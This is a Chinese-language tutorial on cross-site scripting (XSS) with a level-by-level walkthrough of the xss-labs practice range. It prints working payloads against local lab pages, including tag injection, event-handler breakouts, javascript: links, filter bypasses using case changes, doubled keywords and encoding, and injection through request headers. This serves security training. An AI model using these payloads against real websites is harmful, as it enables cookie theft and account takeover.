Web渗透-XSS漏洞深入及xss-labs靶场实战

本文涉及的产品
多模态交互后付费免费试用,全链路、全Agent
简介: XSS(跨站脚本攻击)是常见的Web安全漏洞,通过在网页中注入恶意脚本,窃取用户信息或执行非法操作。本文介绍其原理、分类(反射型、存储型、DOM型)、测试方法及xss-labs靶场实战案例,帮助理解与防御XSS攻击。

一、简介

xss全称(cross site scripting)跨站脚本攻击,是最常见的web应用程序安全漏洞之一,位于owasptop102013年度第三名xss是指攻击者在网页中嵌入客户端脚本,通常是javascrip编写的危险代码,当用户使用浏览网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的。

xss属于客户端攻击,受害者最终是用户,但特别要注意的是网站管理人员也属于用户之一。这就意味着xss可以进行"服务端"攻击,因为管理员要比普通用户的权限大得多,一般管理员都可以对网站进行文件管理,数据管理等操作,而攻击者一股也是靠管理员身份作为"跳板"进行实施攻击。

二、XSS靶场

第一步:git clone拉取或者下载项目压缩包
第二步:放入Apache www服务的根目录中
第三部:访问URL http://localhost/xss-labs/
  • 访问页面效果

三、XSS测试方法

1 工具扫描:appscan,awvs
2 手工测试:burpsuite,firefox(hackbar),xsser xssf
使用手工检测web应用程序是否存在xss漏洞时,最重要的是考虑那里有输入,输入的数据在什么地
方输出。在进行手工检测xss时,人毕竟不像软件那样不知疲惫,所以一定要选择有特殊意义的字符。
这样可以快速测试是否存在xss.
  (1)在目标站点上找到输入点,比如查询接口,留言板等;
  (2)输入一组"特殊字符+唯一识别字符",点击提交后,查看返回的源码,是否有做对应的处理;
  (3)通过搜索定位到唯一字符,结合唯一字符前后语法确认是否可以构造执行)s的条件(构造闭合),提交
  构造的脚本代码,看是否可以成功执行,如果成功执行则说明存在xss漏洞;

四、XSS分类

一、反射性XSS或不持久型XSS

(一) 简介

反射型XSS攻击(Reflected XSS)有称为非持久型跨站点脚本攻击,它是最常见的XSS,漏洞产生的原因是攻击者注入的数据反映在响应中,一个典型的非持久型的XSS包含一个带XSS攻击向量的链接。

每次攻击需要用户点击

(二) 判断
  • 靶场关卡:Pikachu - Cross-Site Scripting -  反射型xss(get)
第一步:找到网站可以输入的地方
第二步:找到网站可以输出的地方
第三步:插入任意JS代码判断是否会执行

二、存储型XSS或持久性XSS

(一) 简介

存储型xss是指应用程序直接将攻击者提交的恶意代码存储到服务端保存,然后永久显示在其他用户的页面上。

比较常见的就是,黑客写下一篇包含恶意javascript代码的博客文章发表后,所有访问该博客的用户,都会在它们的浏览器中执行这段恶意的javascript代码,黑客把恶意的脚本保存到服务端。所以这种xss攻击就叫做"存储型xss".

(二) 作用

获取Cookie ,内网IP等

(三) 判断
存储型xss可能出现的位置:
(1)用户注册
(2)留言板
(3)上传文件的文件名处
(4)管理员可见的报错信息
(5)在线聊天框
(6)客服
(7)问题反馈区
(8)邮件信箱
// 在找漏洞时,使用console.log()方法,判断是否存在漏洞
(四) 示例
  • 靶场关卡:Pikachu - Cross-Site Scripting - 存储型xss
<script>console.log('varin')</script>

三、DOS XSS

(一) 简介

通过javascript,可以重构整个html文档,就是说可以添加,移除等等,对页面的某个东西进行访问的javascript就需要获得对html文档中所有元素进行访问的入口。这个入口就是dom,所以在dom型的xss漏洞利用中,dom可以看成是一个访问html的标准程序接口。
特征:整个过程都是在前端完成的,没有后端的参与(纯前端的操作!)

(二) 利用
// javascript 伪协议
javascript:alert(1)
(三) 示例
  • 靶场关卡:Pikachu - Cross-Site Scripting - DOM型xss

五、xss-labs靶场实战

一、level1

  • 类型:反射型
  • 提示:无
  • 观察:
页面并没有输入的地方,除了URL栏
name长度刚好为:4

  • 测试:
// name参数条件js代码
http://10.196.93.67/xss-labs/level1.php?name=<script>alert('varin')</script>

二、level2

  • 类型:反射型
  • 提示:无
  • 观察:有输入框,按钮,内容显示到h2标签。
  • 思路:输入框输入的内容存储到了h2标签上,通过构建闭合的方式(双引号),嵌入js代码
  • 测试
// 输入框内容:
"</h2><a>ff</a> <script>alert('a')</script>

三、level3

  • 类型:反射型
  • 提示:无
  • 观察:有输入框,按钮,内容显示到h2标签。
  • 思路:
  • 输入框输入的内容存储到了h2标签上,通过构建闭合的方式(单引号),嵌入js代码(失败)
  • 采用闭合的方式,闭合的符号会被转义,导致识别不出来。尝试单击方法
  • 测试
// 输入框内容:
' onclick='alert(1)'

四、level4

  • 类型:反射型
  • 提示:无
  • 特点:输入标签会被去掉<>符号
  • 闭合:双引号
  • 观察:有输入框,按钮,内容显示到h2标签。
  • 思路:尝试单击方法
  • 测试
" onclick="alert('1')">

五、level5

  • 类型:反射型
  • 提示:无
  • 特点:输入script、事件会被转义,输入
  • 闭合:双引号
  • 观察:有输入框,按钮,内容显示到h2标签。
  • 思路:尝试伪协议方法
  • 测试
// 闭合:">
"> <a href='javascript:alert(1)'>abc</a>

六、level6

  • 类型:反射型
  • 提示:无
  • 特点:输入script、href、事件会被转义,输入
  • 闭合:双引号
  • 观察:有输入框,按钮,内容显示到h2标签。
  • 思路:尝试伪协议方法、使用大小写
  • 测试
// 闭合:">
"> <a HREF='javascript:alert(1)'>abc</a>

七、level7

  • 类型:反射型
  • 提示:无
  • 特点:script转为空
  • 闭合:双引号
  • 观察:有输入框,按钮,内容显示到h2标签。
  • 思路:双写
  • 测试
"> <sscriptcript>alert(1)</sscriptcript>

八、level8

# &#x074=t
javascrip&#x074:alert(1)

九、level9

  • 类型:反射型
  • 提示:无
  • 特点:a标签的href必须有htt://字符,使用html字体实体编码
  • 思路:将http://加入到输出信息中
  • 测试
javascrip&#x074:alert('http://')

十、level10

  • 类型:反射型
  • 提示:无
  • 特点:隐藏域
  • 思路:有隐藏域,每个尝试,得到t_sort可以写入值,在尝试是否能闭合value值,并去除隐藏域属性
  • 测试
http://localhost/xss-labs/level10.php?t_link=1&t_sort="onclick='alert(1)'type=''

十一、level11

  • 类型:反射型
  • 提示:ref
  • 特点:Referer,请求头
  • 思路:通过抓包发现Referer参数值传递到了t_ref输入框中,尝试在Referer构建语句

  • 测试
Referer: " type=""  onclick='alert(1)'

十二、level12

  • 类型:反射型
  • 提示:User-Agent
  • 特点:User-Agent,请求头
  • 思路:通过抓包发现User-Agent参数值传递到了t_ua输入框中,尝试在User-Agent构建语句

  • 测试
User-Agent: " type="" onclick="alert(1)"

十三、level13

  • 类型:反射型
  • 提示:Cookie
  • 特点:Cookie,请求头
  • 思路:通过抓包发现Cookie参数值传递到了t_cook输入框中,尝试在Cookie构建语句

  • 测试
Cookie: user=" type="" onclick="alert(1)"; PHPSESSID=600b54c6da94cb911ba2ad52c52ee5bd

十四、level14

  • 页面显示不出来,略过

十五、level15

  • 测试:
http://10.196.93.67/xss-labs/level15.php?src="level1.php?name=<a href='javascript:alert(1)'>varin</a>"

十六、level16

  • 类型:反射型
  • 提示:无
  • 特点:URL编码,字符替换
  • 思路 :将空格转换为回车的ULR编码
  • 测试
// %0a=回车
http://10.196.93.67/xss-labs/level16.php?keyword= <img%0asrc=a%0aonerror=alert(1)>

十七、evel17

  • 类型:反射型
  • 提示:无
  • 特点:将空格插入到b前方,可以将b顶出来
  • 思路 :使用特殊字符随机位置尝试,如空格,单引号,双引号等。

  • 测试
http://10.196.93.67/xss-labs/level17.php?arg01=a&arg02= onmouseover=alert(1)

十八、level18

  • 通过方式level17关类似。
http://10.196.93.67/xss-labs/level18.php?arg01=a&arg02= onmouseover=alert(1)

目录
相关文章
|
20天前
|
存储 安全 前端开发
Web渗透-文件上传漏洞-上篇
文件上传漏洞常见于Web应用,因类型限制不严可致恶意文件执行。本文介绍前端检测、MIME类型、黑名单、.htaccess、空格、双写等多种绕过方式,并结合upload-labs靶场演示利用方法,提升安全防护认知。
91 0
Web渗透-文件上传漏洞-上篇
|
20天前
|
安全 中间件 应用服务中间件
WEB渗透-文件上传漏洞-下篇
本文详解文件上传安全漏洞,涵盖白名单绕过(如00截断、条件竞争)、图片木马制作与利用、以及IIS、Apache、Nginx等常见解析漏洞原理与防御。结合实战案例,深入剖析攻击手法与修复方案。
75 0
|
20天前
|
安全 测试技术 程序员
web渗透-文件包含漏洞
文件包含漏洞源于程序动态包含文件时未严格校验用户输入,导致可加载恶意文件。分为本地和远程包含,常见于PHP,利用伪协议、日志或session文件可实现代码执行,需通过合理过滤和配置防范。
294 0
web渗透-文件包含漏洞
|
存储 安全 JavaScript
手摸手带你进行XSS攻击与防御
当谈到网络安全和信息安全时,跨站脚本攻击(XSS)是一个不可忽视的威胁。现在大家使用邮箱进行用户认证比较多,如果黑客利用XSS攻陷了用户的邮箱,拿到了cookie那么就可以冒充你进行收发邮件,那真就太可怕了,通过邮箱验证进行其他各种网站的登录与高危操作。 那么今天,本文将带大家深入了解XSS攻击与对应的防御措施。
|
11月前
|
JavaScript 安全 前端开发
同源策略如何防止 XSS 攻击?
【10月更文挑战第31天】同源策略通过对 DOM 访问、Cookie 访问、脚本执行环境和跨源网络请求等多方面的严格限制,构建了一道坚实的安全防线,有效地防止了 XSS 攻击,保护了用户在网络浏览过程中的数据安全和隐私。
319 49
|
11月前
|
安全 前端开发 Java
Web安全进阶:XSS与CSRF攻击防御策略深度解析
【10月更文挑战第26天】Web安全是现代软件开发的重要领域,本文深入探讨了XSS和CSRF两种常见攻击的原理及防御策略。针对XSS,介绍了输入验证与转义、使用CSP、WAF、HTTP-only Cookie和代码审查等方法。对于CSRF,提出了启用CSRF保护、设置CSRF Token、使用HTTPS、二次验证和用户教育等措施。通过这些策略,开发者可以构建更安全的Web应用。
521 4
|
11月前
|
安全 Go PHP
Web安全进阶:XSS与CSRF攻击防御策略深度解析
【10月更文挑战第27天】本文深入解析了Web安全中的XSS和CSRF攻击防御策略。针对XSS,介绍了输入验证与净化、内容安全策略(CSP)和HTTP头部安全配置;针对CSRF,提出了使用CSRF令牌、验证HTTP请求头、限制同源策略和双重提交Cookie等方法,帮助开发者有效保护网站和用户数据安全。
354 2
|
11月前
|
存储 安全 Go
Web安全基础:防范XSS与CSRF攻击的方法
【10月更文挑战第25天】Web安全是互联网应用开发中的重要环节。本文通过具体案例分析了跨站脚本攻击(XSS)和跨站请求伪造(CSRF)的原理及防范方法,包括服务器端数据过滤、使用Content Security Policy (CSP)、添加CSRF令牌等措施,帮助开发者构建更安全的Web应用。
466 3
|
12月前
|
存储 JavaScript 前端开发
Xss跨站脚本攻击(Cross Site Script)
Xss跨站脚本攻击(Cross Site Script)
|
11月前
|
SQL 存储 安全
什么是XSS攻击?什么是SQL注入攻击?什么是CSRF攻击?
理解并防范XSS、SQL注入和CSRF攻击是Web应用安全的基础。通过采用严格的输入验证、使用安全编码实践以及实现适当的身份验证和授权机制,可以有效防止这些常见的Web攻击,保障应用程序和用户的数据安全。
491 0

热门文章

最新文章